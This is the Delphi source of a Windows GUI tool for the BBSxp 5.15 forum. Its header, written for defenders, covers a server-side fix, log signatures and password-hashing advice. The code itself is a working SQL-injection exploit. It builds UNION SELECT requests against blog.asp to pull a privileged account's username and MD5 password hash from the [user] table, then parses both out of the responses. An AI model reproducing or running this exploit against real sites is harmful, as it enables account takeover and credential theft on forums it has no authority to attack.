“BBSxp 5.15”暴库工具源码
// Delphi form unit for the "BBSxp 5.15" database-disclosure tool published on this page.
//
// What the code shows: two GET requests are sent to blog.asp under a base URL
// entered by the operator. Each request places a UNION SELECT in the `id`
// query parameter so that a column of the [user] table ([username], then
// [userpass]) is echoed back in the response, where it is located by a plain
// text search for 'username'.
//
// Reviewer notes for defenders:
//  - That blog.asp answers such a request implies `id` reaches the SQL
//    statement without validation (inferred from the request shape; the
//    server-side code is not on this page). The fix belongs on the server:
//    accept only an integer for `id` and bind it as a query parameter.
//  - In web-server logs the requests are recognisable by SQL keywords and
//    bracketed table/column names ("union", "select", "[user]") inside the
//    `id` parameter of blog.asp.
//  - The original author notes that the second response usually arrives with
//    an HTTP error status, so log review should not be limited to successful
//    responses, and verbose database errors should not be returned to clients.
//  - The value recovered by the second request is described by the author as
//    a fixed 32-character MD5 value. A bare MD5 digest gives little
//    protection once disclosed; affected passwords should be treated as
//    compromised and storage moved to a salted, slow password hash.
unit unit1;

interface

uses
  windows, messages, sysutils, variants, classes, graphics, controls, forms,
  dialogs, idbasecomponent, idcomponent, idtcpconnection, idtcpclient, idhttp,
  stdctrls, idantifreezebase, idantifreeze, winhttp, comctrls, extctrls,
  winskindata;

type
  // Main (and only) form. Component roles below are taken from how the
  // handlers use them; the .dfm layout is not part of this page.
  tform1 = class(tform)
    edit1: tedit;            // base URL typed by the operator (prefix of both requests)
    edit2: tedit;            // receives the account name parsed from the first response
    edit3: tedit;            // receives the 32-character value parsed from the second response
    button1: tbutton;        // starts the two requests (button1click)
    idhttp1: tidhttp;        // client used for the first (synchronous) request
    winhttp1: twinhttp;      // client used for the second request; result arrives via events
    label1: tlabel;
    label2: tlabel;
    label3: tlabel;
    bevel1: tbevel;
    button2: tbutton;        // closes the form (button2click)
    statusbar1: tstatusbar;
    procedure button1click(sender: tobject);
    procedure winhttp1done(sender: tobject; const contenttype: string; filesize: integer; stream: tstream);
    procedure winhttp1httperror(sender: tobject; errorcode: integer; stream: tstream);
    procedure button2click(sender: tobject);
    procedure edit3change(sender: tobject);
  private
    { private declarations }
  public
    { public declarations }
  end;

var
  form1: tform1;

implementation

{$r *.dfm}

// Builds both request URLs from edit1.text, performs the first request with
// idhttp1 and parses the account name out of the body, then hands the second
// URL to winhttp1. The second response is handled in winhttp1done /
// winhttp1httperror.
procedure tform1.button1click(sender: tobject);
var
  s1:string;
  url1,url2:string;
  i:integer;
begin
  // Refuse to run without a base URL.
  if edit1.text ='' then
  begin
    showmessage(' 请输入网址先!');
    exit;
  end;
  // Both URLs differ only in the selected column ([username] vs [userpass]).
  // The base URL is concatenated as typed; no separator is added here.
  // Rows are restricted to membercode=5 (the meaning of that value is not
  // stated on this page).
  url1:=edit1.text+'blog.asp?id=1%20union%20select%20top%201%201,[username],1,1,1,1,1%20from%20[user]%20where%20membercode=5';
  url2:=edit1.text+'blog.asp?id=1%20union%20select%20top%201%201,[userpass],1,1,1,1,1%20from%20[user]%20where%20membercode=5';
  // ---- account-name request (idhttp) ----
  try
    form1.caption :='正在暴取账号......';
    s1:=idhttp1.get(url1);
    // The literal text 'username' in the body is used as the marker for a
    // response that echoed the selected column.
    if pos('username',s1)<>0 then
    begin
      i:=pos('username',s1);
      s1:=copy(s1,i+9,15); // account-name length is not fixed, but is at most 12 characters
      i:=pos('">',s1);
      s1:=copy(s1,1,i-1); // keep only the text before the first '">' : the account name
      edit2.text :=s1;
      idhttp1.disconnect ; // close the connection
    end
    else
    begin
      // Marker not found: restore the window title and report failure.
      form1.caption :='[bbsxp 5.15]暴库工具 ';
      showmessage('暴库失败!可能不存在此漏洞!');
      idhttp1.disconnect ; // close the connection
      exit;
    end;
  except
    // Any exception (the message shown mentions network timeout or other error).
    form1.caption :='[bbsxp 5.15]暴库工具 ';
    showmessage('网络超时或其他错误!');
    idhttp1.disconnect ;
    exit; // on error, stop here and do not run the code below
  end;
  // ---- account-name step finished ----
  // ---- if the account-name step succeeded, the password step is expected to succeed too, so continue ----
  // ---- password request (winhttp) ----
  form1.caption :='正在暴取密码......';
  winhttp1.url :=url2;
  winhttp1.read;
  // ---- continues in winhttp1done and winhttp1httperror ----
end;

// ---- winhttp1done and winhttp1httperror must contain the same code, because the password response usually arrives in the error state ----

// Completion handler for winhttp1: copies the whole response stream into a
// string and, if it contains 'username', puts the 32 characters starting
// 9 positions after the match into edit3.
procedure tform1.winhttp1done(sender: tobject; const contenttype: string; filesize: integer; stream: tstream);
var
  s2:string;
  i:integer;
begin
  // `size` resolves to the stream's size through the `with` clause.
  with stream as tmemorystream do
  begin
    setlength(s2,size);
    stream.read(s2[1],size);
  end;
  if pos('username',s2)<>0 then
  begin
    i:=pos('username',s2);
    s2:=copy(s2,i+9,32); // the stored value is a fixed 32-character MD5, so taking 32 characters yields it directly
    edit3.text :=s2;
  end;
end;

// HTTP-error handler for winhttp1: same parsing as winhttp1done, applied to
// the body delivered with the error. errorcode is not inspected.
procedure tform1.winhttp1httperror(sender: tobject; errorcode: integer; stream: tstream);
var
  s2:string;
  i:integer;
begin
  // `size` resolves to the stream's size through the `with` clause.
  with stream as tmemorystream do
  begin
    setlength(s2,size);
    stream.read(s2[1],size);
  end;
  if pos('username',s2)<>0 then
  begin
    i:=pos('username',s2);
    s2:=copy(s2,i+9,32); // the stored value is a fixed 32-character MD5, so taking 32 characters yields it directly
    edit3.text :=s2;
  end;
end;

// Closes the form.
procedure tform1.button2click(sender: tobject);
begin
  close;
end;

// Restores the idle window title whenever edit3's text changes, i.e. once the
// second response has been written into it.
procedure tform1.edit3change(sender: tobject);
begin
  form1.caption :='[bbsxp 5.15]暴库工具 ';
end;

end.
